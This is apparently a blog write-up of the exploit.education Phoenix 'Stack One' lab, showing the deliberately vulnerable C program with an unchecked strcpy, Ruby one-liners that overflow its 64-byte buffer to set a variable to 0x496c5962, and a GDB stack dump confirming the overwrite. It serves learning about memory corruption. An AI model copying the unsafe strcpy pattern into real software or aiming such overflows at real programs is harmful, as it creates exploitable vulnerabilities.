loading...

(Write-up) Phoenix :: Stack One

aibhstin profile image Aibhstin ・2 min read

The source code for this challenge is given as the following:

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  if (argc < 2) {
    errx(1, "specify an argument, to be copied into the \"buffer\"");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, argv[1]);

  if (locals.changeme == 0x496c5962) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Getting closer! changeme is currently 0x%08x, we want 0x496c5962\n",
        locals.changeme);
  }

  exit(0);
}

This time, we have to change the variable to a specific hexadecimal value. Simply altering it isn't enough. The program is functionally the same as the previous, so we'll use the same Ruby code as the base for this one, injecting 64 'A's is enough to reach the location in memory of the variable we need to change.

user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-one `ruby -e 'puts "A" * 64'`
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Getting closer! changeme is currently 0x00000000, we want 0x496c5962
user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-one `ruby -e 'puts "A" * 65'`
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Getting closer! changeme is currently 0x00000041, we want 0x496c5962

The following Ruby script is piped into a file and this file can be given as input to the program to trigger the exploit.

user@phoenix-amd64:/opt/phoenix/amd64$ ruby -e 'puts "A" * 64 + ["62596c49"].pack("H*")' > /tmp/stack-one-out
user@phoenix-amd64:/opt/phoenix/amd64$ cat /tmp/stack-one-out 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbYlI
user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-one `cat /tmp/stack-one-out`
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value

The benefit of changing it to a specific value like this is now we can examine the memory in GDB to see where exactly the overflow takes place.

(gdb) x/40xw $rsp
0x7fffffffe5a0: 0xffffe658      0x00007fff      0x00000000      0x00000002
0x7fffffffe5b0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe5c0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe5d0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe5e0: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe5f0: 0x496c5962      0x00000000      0x00000000      0x00000000
0x7fffffffe600: 0x00000002      0x00000000      0xf7d8fd62      0x00007fff
0x7fffffffe610: 0x00000000      0x00000000      0xffffe650      0x00007fff
0x7fffffffe620: 0x00000000      0x00000000      0xf7ffdbc8      0x00007fff
0x7fffffffe630: 0x00003e00      0x04000001      0x00400539      0x00000000

We see our value at 0x7fffffffe5f0, so this is memory address where the overflow occurs. This can differ from case to case, especially as environment variables are stored on the stack, potentially altering exact positions.

Posted on by:

aibhstin profile

Aibhstin

@aibhstin

I'm an Ethical Hacking & Cybersecurity student and a Haskell programmer.

Discussion

markdown guide